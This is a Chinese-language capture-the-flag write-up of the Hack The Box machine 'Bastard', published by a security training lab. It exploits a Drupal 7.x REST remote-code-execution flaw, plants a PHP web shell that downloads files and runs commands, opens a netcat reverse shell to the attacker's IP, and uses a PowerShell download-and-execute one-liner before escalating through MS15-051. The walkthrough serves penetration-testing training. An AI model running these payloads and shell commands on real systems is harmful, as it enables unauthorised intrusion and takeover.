HTB系列之七:Bastard

Ms08067安全實驗室發表於2021-03-09

出品|MS08067實驗室(www.ms08067.com)

這次挑戰的是 HTB 的第7臺靶機:Bastard

技能收穫:

  • PHP Unserilaize
  • CMS Version Identify
  • Windows privilege escalation :Sherlock

資訊收集

基本資訊

Bastard IP:10.10.10.9
Kali IP:10.10.14.23

埠列舉

nmap -A -p- -v -T4 10.10.10.9

發現開啟了80(IIS),訪問之

看起來是drupal cms,訪問 robots.txt ,發現版本變更檔案

版本:Drupal 7.54

漏洞發現

searchsploit drupal 7.x

該版本存在 rce ,編輯 exploit

該exploit會攻擊由服務擴充套件建立的REST端點,我們只需要找出REST端點的名稱即可利用該漏洞。

通過目錄列舉,我們發現 endpoint 為 /rest,用其替換exploit

gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

漏洞利用

php exp.php

沒有反應,掛上 burpsuite 看看

設定 exp 的target為 burp 的監聽埠

依然沒回應,那應該是缺少php包,未成功傳送

檢查發現,Kali缺少 php-curl 包,安裝好成功返回響應並寫入 shell.php

apt install php-curl

利用 session.json 可以偽造會話,成功登入

已知目標是 x64 的系統,我們上傳 nc.exe

下載地址:https://eternallybored.org/misc/netcat/

給 exp 新增一個檔案上傳功能,也可以使用 smb檔案共享,使用 copy \ip\nc64.exe nc.exe上傳

$phpmine = <<<'EOD'
<?php 
if(isset($_GET['fupload'])){  file_put_contents($_GET['fupload'],file_get_contents("http://10.10.14.15:8000/".$_GET['fuploa'])); 
};
if(isset($_GET['fexec'])){
  echo "<pre>" . shell_exec($_GET['fexec']) . "</pre>"; 
};
?>
EOD;
 
$file = [ 
     'filename' => 'cmd.php',      
     'data' => $phpmine 
];
10.10.10.9/233.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.15 4444

許可權提升

git clone git clone https://github.com/rasta-mouse/Sherlock.git

Sherlock是一個在Windows下用於本地提權的PowerShell指令碼

http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -

提示 ms15-051 , 利用之

提權程式下載地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上傳並執行

建立 nc 會話

至此完成

參考文章

Drupal 7.x RCE 漏洞分析 附EXP:

https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/



轉載請聯絡作者並註明出處!

Ms08067安全實驗室專注於網路安全知識的普及和培訓。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,《Python安全攻防:滲透測試實戰指南》,《Java程式碼安全審計(入門篇)》等書籍。
團隊公眾號定期分享關於CTF靶場、內網滲透、APT方面技術乾貨,從零開始、以實戰落地為主,致力於做一個實用的乾貨分享型公眾號。
官方網站:https://www.ms08067.com/

掃描下方二維碼加入實驗室VIP社群
加入後邀請加入內部VIP群,內部微信群永久有效!

HTB系列之七:BastardHTB系列之七:BastardHTB系列之七:Bastard

HTB系列之七:BastardHTB系列之七:BastardHTB系列之七:Bastard

相關文章